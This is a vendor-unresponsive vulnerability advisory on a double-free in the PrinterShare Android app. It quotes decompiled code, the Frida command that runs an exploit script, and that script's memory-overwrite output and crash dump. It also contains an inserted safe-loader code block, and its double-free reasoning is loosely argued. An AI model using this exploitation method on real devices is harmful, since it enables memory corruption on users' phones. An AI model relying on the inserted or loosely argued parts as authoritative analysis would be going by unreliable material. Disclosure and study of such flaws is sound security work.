KL-001-2025-005: Mobile Dynamix PrinterShare Mobile Print Double-Free Memory Write

Title: Mobile Dynamix PrinterShare Mobile Print Double-Free Memory Write
Advisory ID: KL-001-2025-005
Publication Date: 2025-05-22
Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2025-005.txt

1. Vulnerability Details

     Affected Vendor: Mobile Dynamix
     Affected Product: PrinterShare Mobile Print
     Affected Version: up to 12.15.01
     Platform: Android
     CWE Classification: CWE-415: Double-Free, CWE-416: Use-After-Free
     CVE ID: CVE-2025-5100

2. Vulnerability Description

     A double-free condition occurs during the cleanup of temporary image
     files, which can be exploited to achieve memory corruption and
     potentially arbitrary code execution.

3. Technical Description

     * Performed on Android 13 aarch64 - Samsung Rooted (Galaxy Tab A7 Lite)
     * Using Frida client on Ubuntu 24.04 LTS - Frida server on the rooted
       Samsung device.
     * Play Store location:
       https://play.google.com/store/apps/details?id=com.dynamixsoftware.printershare&hl=en-US
     * The target Activity is exported, which means any application may
       interact with it, provided the required permissions are granted.

     The vulnerability is in the bitmap handling in ActivityPrintPictures.
     The v1() method loads bitmaps from files or content URIs and calls
     x1() after attempting to decode a bitmap. In the exception handler for
     OutOfMemoryError it recycles the bitmap. The x1() method (visible in
     the Frida hooks) creates a 512x512 bitmap and immediately recycles it.
     When an OutOfMemoryError occurs during bitmap loading in v1(), the
     bitmap is recycled in the error handler.
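     For comparison with the decompiled v1()/x1() methods quoted in this
     section, the following is an added example (not code from the advisory
     or from the vendor) of a loader that keeps the same retry-with-
     inSampleSize behaviour but releases each Bitmap at most once and drops
     the throwaway allocate-and-recycle; the class and method names
     SafeBitmapLoader, loadBitmap and releaseOnce are assumptions.

```java
import android.content.ContentResolver;
import android.graphics.Bitmap;
import android.graphics.BitmapFactory;
import android.net.Uri;
import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;
import java.io.InputStream;

// Added example; SafeBitmapLoader, loadBitmap and releaseOnce are assumed names.
public final class SafeBitmapLoader {
    private static final int MAX_ATTEMPTS = 3;

    // Releases a bitmap at most once; safe with null or an already-recycled bitmap.
    // This isRecycled() guard is what the advisory's OutOfMemoryError handler lacks.
    static void releaseOnce(Bitmap bitmap) {
        if (bitmap != null && !bitmap.isRecycled()) {
            bitmap.recycle();
        }
    }

    // Same retry loop as v1() (inSampleSize doubles on each attempt), but:
    //  - the stream is closed on every path by try-with-resources,
    //  - a successfully decoded bitmap is handed to the caller, never recycled here,
    //  - there is no throwaway 512x512 allocate-and-recycle like x1().
    public static Bitmap loadBitmap(ContentResolver resolver, File file, Uri uri) {
        for (int attempt = 0; attempt < MAX_ATTEMPTS; attempt++) {
            BitmapFactory.Options options = new BitmapFactory.Options();
            options.inPreferredConfig = Bitmap.Config.ARGB_8888;
            options.inSampleSize = 1 << attempt;   // 1, 2, 4: halve the image per retry
            Bitmap decoded = null;
            try (InputStream in = file != null
                    ? new FileInputStream(file)
                    : resolver.openInputStream(uri)) {
                if (in == null) {
                    return null;                    // nothing to decode
                }
                decoded = BitmapFactory.decodeStream(in, null, options);
                if (decoded != null) {
                    return decoded;                 // caller now owns it
                }
            } catch (IOException e) {
                return null;                        // unreadable source: nothing to free
            } catch (OutOfMemoryError oom) {
                releaseOnce(decoded);               // single guarded release, then retry smaller
            }
        }
        return null;                                // all attempts failed
    }
}
```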
     public Bitmap v1(l lVar) {
         Bitmap bitmap = null;
         boolean z2 = false;
         for (int i3 = 0; i3 < 3; i3++) {
             try {
                 B.e();
                 BitmapFactory.Options options = new BitmapFactory.Options();
                 options.inPreferredConfig = Bitmap.Config.ARGB_8888;
                 options.inDither = false;
                 if (i3 > 0) {
                     options.inSampleSize = 1 << i3;   // retry at lower resolution
                 }
                 InputStream fileInputStream = lVar.f5200c != null
                         ? new FileInputStream(lVar.f5200c)
                         : getContentResolver().openInputStream(lVar.f5198a);
                 if (fileInputStream != null) {
                     bitmap = BitmapFactory.decodeStream(fileInputStream, null, options);
                     fileInputStream.close();
                 }
                 x1();   // allocates and immediately recycles a second bitmap
                 break;
             } catch (IOException e3) {
                 e3.printStackTrace();
                 B.A(e3);
             } catch (OutOfMemoryError unused) {
                 if (bitmap != null) {
                     bitmap.recycle();   // first release, in the OOM handler
                     bitmap = null;
                 }
                 if (!z2 && i3 > 0) {
                     B.a();
                     z2 = true;
                 }
             }
         }
         return bitmap;
     }

     Then x1() is called, which creates and recycles another bitmap.

     private void x1() {
         Bitmap createBitmap = Bitmap.createBitmap(512, 512, Bitmap.Config.ARGB_8888);
         if (createBitmap != null) {
             createBitmap.recycle();   // second release of a block the allocator may reuse
         }
     }

     The Android memory allocator may reuse the same memory block, which
     results in the same address being freed twice (double-free).

     The following Frida session demonstrates the memory corruption: the
     script first intercepts freed memory chunks, then writes to that
     memory and monitors the cache.

     $ frida -U -f com.dynamixsoftware.printershare -l exploit.js
          ____
         / _  |   Frida 16.6.5 - A world-class dynamic instrumentation toolkit
        | (_| |
         > _  |   Commands:
        /_/ |_|       help      -> Displays the help system
        . . . .       object?   -> Display information about 'object'
        . . . .       exit/quit -> Exit
        . . . .
        . . . .   More info at https://frida.re/docs/home/
        . . . .
        . . . .   Connected to SM T220 (id=R83X10JATAV)
     Spawning `com.dynamixsoftware.printershare`...
     [+] Found 'free' function at 0x78b4adbf30 in module: libc.so
     [+] Double-free exploitation script initialized
     [+] Targeting the v1()->x1() bitmap handling vulnerability
     [+] Waiting for free() calls to intercept...
     Spawned `com.dynamixsoftware.printershare`.
     Resuming main thread!
     [SM T220::com.dynamixsoftware.printershare ]->
     ...SNIP...
     === Memory at 0xb400007820205700 AFTER overwrite ===
                0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
     00000000  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
     00000010  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
     00000020  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
     00000030  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
     00000040  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
     00000050  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
     00000060  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
     00000070  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
     [+] Immediate exploitation succeeded for 0xb400007820205700

     === Memory at 0xb4000078202ad320 BEFORE overwrite ===
                0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
     00000000  64 61 6c 76 69 6b 2f 73 79 73 74 65 6d 2f 56 4d  dalvik/system/VM
     00000010  52 75 6e 74 69 6d 65 00 65 61 64 3b 00 00 00 00  Runtime.ead;....
     00000020  10 71 a1 1d 78 00 00 00 ff ff ff ff ff ff ff ff  .q..x...........
     00000030  00 00 00 00 00 00 00 00 20 d3 2a 20 78 00 00 b4  ........ .* x...
     00000040  01 00 00 00 02 00 00 00 08 8a 31 20 78 00 00 b4  ..........1 x...
     00000050  00 00 00 00 00 00 00 00 60 d2 2a 20 78 00 00 b4  ........`.* x...
     00000060  41 84 07 1d 78 00 00 00 00 66 2f 20 78 00 00 b4  A...x....f/ x...
     00000070  00 00 00 00 00 00 00 00 98 d2 2a 20 78 00 00 b4  ..........* x...
     [+] Successfully wrote 500 bytes to 0xb4000078202ad320
     === Memory at 0xb4000078202ad320 AFTER overwrite ===
                0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
     00000000  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
     00000010  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
     00000020  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
     00000030  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
     00000040  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
     00000050  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
     00000060  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
     00000070  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
     [+] Immediate exploitation succeeded for 0xb4000078202ad320

     === Memory at 0xb4000078202ad300 BEFORE overwrite ===
                0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
     00000000  4c 64 61 6c 76 69 6b 2f 73 79 73 74 65 6d 2f 56  Ldalvik/system/V
     00000010  4d 52 75 6e 74 69 6d 65 3b 00 00 00 1e 00 00 00  MRuntime;.......
     00000020  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
     00000030  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
     00000040  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
     00000050  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
     00000060  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
     00000070  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
     [+] Successfully wrote 500 bytes to 0xb4000078202ad300
     === Memory at 0xb4000078202ad300 AFTER overwrite ===
                0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
     00000000  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
     00000010  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
     00000020  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
     00000030  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
     00000040  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
     00000050  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
     00000060  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
     00000070  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
     [+] Immediate exploitation succeeded for 0xb4000078202ad300

     === Memory at 0xb4000078202ad2e0 BEFORE overwrite ===
                0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
     00000000  64 61 6c 76 69 6b 2e 73 79 73 74 65 6d 2e 56 4d  dalvik.system.VM
     00000010  52 75 6e 74 69 6d 65 00 61 64 00 20 78 00 00 b4  Runtime.ad. x...
     00000020  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
     00000030  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
     00000040  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
     00000050  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
     00000060  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
     00000070  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
     [+] Successfully wrote 500 bytes to 0xb4000078202ad2e0
     === Memory at 0xb4000078202ad2e0 AFTER overwrite ===
                0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
     00000000  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
     00000010  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
     00000020  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
     00000030  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
     00000040  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
     00000050  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
     00000060  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
     00000070  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
     [+] Immediate exploitation succeeded for 0xb4000078202ad2e0
     Process crashed: Bad access due to invalid address

     *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
     Build fingerprint: 'samsung/gta7litewifixx/gta7litewifi:13/TP1A.220624.014/T220XXS6CWL2:user/release-keys'
     Revision: '0'
     ABI: 'arm64'
     Processor: '0'
     Timestamp: 2025-03-02 10:54:25.642520460-0800
     Process uptime: 3s
     Cmdline: com.samsung.android.scs
     pid: 32625, tid: 32625, name: ung.android.scs  >>> com.samsung.android.scs <<<
     uid: 10243
     signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x0041414141414140
         x0  0000000000000001  x1  4141414141414141  x2  0000000072a27ffc  x3  0000000000000001
         x4  0000007feb0e8530  x5  000000781d065ee0  x6  000000000000001a  x7  0000000000000018
         x8  0000007feb0e87c0  x9  4141414141414140  x10 0000007feb0e8150  x11 0000000000000006
         x12 0000000000000069  x13 000000781dc0e180  x14 000000781dc0c598  x15 0000000000000000
         x16 0000000020000001  x17 0000000000000000  x18 00000078ccb6a000  x19 b400007820205650
         x20 b400007820205660  x21 0000000072e625d0  x22 4141414141414141  x23 000000781d776d80
         x24 b4000078202cd400  x25 00000078cc4c1000  x26 000000781dc0d000  x27 0000007feb0e8960
         x28 b400007820244800  x29 0000007feb0e8900
         lr  000000781d2cc408  sp  0000007feb0e86d0  pc  000000781d2cc190  pst 0000000080000000

     backtrace:
           #00 pc 00000000002cc190  /apex/com.android.art/lib64/libart.so (artQuickResolutionTrampoline+2764) (BuildId: 629e0ffca501d809c29dbbeef2f512d3)
           #01 pc 000000000037ee08  /apex/com.android.art/lib64/libart.so (art_quick_resolution_trampoline+88) (BuildId: 629e0ffca501d809c29dbbeef2f512d3)
           #02 pc 0000000000780108  /apex/com.android.art/lib64/libart.so (nterp_helper+152) (BuildId: 629e0ffca501d809c29dbbeef2f512d3)
           #03 pc 000000000003fb3a  /apex/com.android.conscrypt/javalib/conscrypt.jar (com.android.org.conscrypt.TrustedCertificateStore.setDefaultUserDirectory+14)
           #04 pc 0000000000b716dc  /data/misc/apexdata/com.android.art/dalvik-cache/arm64/boot.oat (android.app.ActivityThread.main+764)
     ***
     [SM T220::com.dynamixsoftware.printershare ]->

4. Mitigation and Remediation Recommendation

     No response from vendor. There are no known mitigations for
     end-users of the affected application versions.

5. Credit

     This vulnerability was discovered by Felix Segoviano of KoreLogic, Inc.

6. Disclosure Timeline

     2025-04-09 : KoreLogic requests security contact from vendor via
                  {info,support}@mobiledynamix.com.
     2025-04-11 : KoreLogic requests security contact from vendor via
                  {info,support}@mobiledynamix.com.
     2025-04-29 : KoreLogic submits vulnerability details to vendor via
                  {info,support}@mobiledynamix.com.
     2025-05-22 : KoreLogic public disclosure.

7. Proof of Concept

     URL: https://korelogic.com/Resources/Advisories/KL-001-2025-005.poc.js.txt
     SHA256sum: 596c119c3b1ef6749d59ff5def5b2e88bca04dde15e86683d074d259458519da

The contents of this advisory are copyright (c) 2025 KoreLogic, Inc. and are
licensed under a Creative Commons Attribution Share-Alike 4.0 (United
States) License: http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a proven
track record of providing security services to entities ranging from
Fortune 500 to small and mid-sized companies. We are a highly skilled
team of senior security consultants doing by-hand security assessments
for the most important networks in the U.S. and around the world. We are
also developers of various tools and resources aimed at helping the
security community.
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:
https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy